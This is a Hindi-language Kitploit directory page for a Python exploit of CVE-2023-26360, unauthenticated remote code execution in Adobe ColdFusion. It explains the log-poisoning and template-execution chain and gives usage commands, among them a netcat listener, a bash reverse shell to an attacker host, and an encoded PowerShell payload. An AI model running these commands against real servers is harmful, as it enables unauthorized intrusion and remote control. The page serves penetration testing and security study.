Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/joaoaugustom/adobe_coldfusion_rce_unauthenticated
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubjoaoaugustom/adobe_coldfusion_rce_unauthenticated

Adobe_ColdFusion_RCE_Unauthenticated

यह एक्सप्लॉइट CVE-2023-26360 (https://nvd.nist.gov/vuln/detail/CVE-2023-26360) पर आधारित है और इसे Metasploit मॉड्यूल तथा jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit के आधार पर निर्मित किया गया है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
12 महीने पहलेअभी तक समीक्षित नहीं

CVE-2023-26360 — Adobe ColdFusion बिना प्रमाणीकरण के RCE

CVE-2023-26360 के लिए दूरस्थ कोड निष्पादन शोषण का Python कार्यान्वयन, मूल Metasploit module के विश्लेषण और jakabakos के पूर्व कार्य पर आधारित।

यह क्यों मौजूद है

jakabakos का PoC <cfexecute> को सीधे _variables पैरामीटर में इंजेक्ट करने और एक ही चरण में ColdFusion लॉग से आउटपुट पढ़ने का प्रयास करता है। यह दृष्टिकोण विफल हो जाता है क्योंकि ColdFusion उस संदर्भ में CFML टैग का इनलाइन मूल्यांकन नहीं करता है, जिसके परिणामस्वरूप बिना कोड निष्पादन के 500 त्रुटि होती है।

यह कार्यान्वयन Metasploit मॉड्यूल द्वारा उपयोग किए गए सही दो-चरणीय तंत्र को दोहराता है:

  1. लॉग विषाक्तीकरण — कमजोर CFC एंडपॉइंट पर एक दूषित _variables पेलोड ({<cftry>CFML</cftry>) भेजता है। ColdFusion इसे पार्स करने में विफल रहता है और कच्ची सामग्री — जिसमें CFML कोड भी शामिल है — को coldfusion-out.log में लिखता है।
  2. टेम्पलेट निष्पादन — क्लासनेम डिसीरियलाइज़ेशन भेद्यता का उपयोग करके विषाक्त लॉग फ़ाइल को ColdFusion टेम्पलेट के रूप में लोड करता है, जिससे सर्वर इंजेक्ट किए गए CFML को निष्पादित करता है।

कमांड निष्पादन createObject के माध्यम से java.lang.Runtime.exec() के द्वारा किया जाता है, जो <cfexecute> पर किसी भी निर्भरता से बचाता है, जो आमतौर पर सख्त या उत्पादन परिनियोजन में अक्षम होता है।

प्रभावित संस्करण

  • Adobe ColdFusion 2021 अपडेट 5 और पहले के
  • Adobe ColdFusion 2018 अपडेट 15 और पहले के

आवश्यकताएँ

root@kitploit:~
pip install -r requirements.txt

उपयोग

शोषण चलाने से पहले एक लिसनर प्रारंभ करें:

root@kitploit:~
nc -lvnp 4444

Windows लक्ष्य:

root@kitploit:~
python exploit.py --host http://TARGET:8500 --win --cmd "powershell -e <BASE64_PAYLOAD>"

Linux लक्ष्य:

root@kitploit:~
python exploit.py --host http://TARGET:8500 --cmd "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

प्रॉक्सी के माध्यम से (जैसे Burp Suite):

root@kitploit:~
python exploit.py --host http://TARGET:8500 --win --cmd "whoami" --proxy http://127.0.0.1:8080

विकल्प

फ़्लैगविवरण
--host

यह कैसे काम करता है

root@kitploit:~
┌─────────────┐         Step 1: plant CFML          ┌──────────────────┐
│   Attacker  │ ──── POST /_variables={<cftry>...  ──► iedit.cfc        │
│             │      CF fails to parse, logs CFML     │                  │
│             │                                       │ coldfusion-      │
│             │         Step 2: trigger execution     │ out.log          │
│             │ ──── POST classname=X..\logs\cf... ──► (loaded as       │
│             │                                       │  CFML template)  │
│  Listener   │ ◄─────────────── reverse shell ───────│                  │
└─────────────┘                                       └──────────────────┘

संदर्भ

  • Adobe सुरक्षा सलाहकार
  • Rapid7 विश्लेषण — AttackerKB
  • Metasploit मॉड्यूल
  • jakabakos PoC

अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा मूल्यांकन (पेनिट्रेशन टेस्ट, CTF, प्रयोगशाला वातावरण) के लिए प्रदान किया जाता है। स्पष्ट लिखित अनुमति के बिना सिस्टम के विरुद्ध इस शोषण को चलाना अवैध है। लेखक किसी भी दुरुपयोग के लिए कोई देयता नहीं लेता है।

टूल डाउनलोड करें
लक्ष्य आधार URL (जैसे http://192.168.1.10:8500)
--cmdलक्ष्य पर निष्पादित करने का आदेश
--winयदि लक्ष्य Windows होस्ट है तो यह फ़्लैग सेट करें
--proxyवैकल्पिक HTTP प्रॉक्सी URL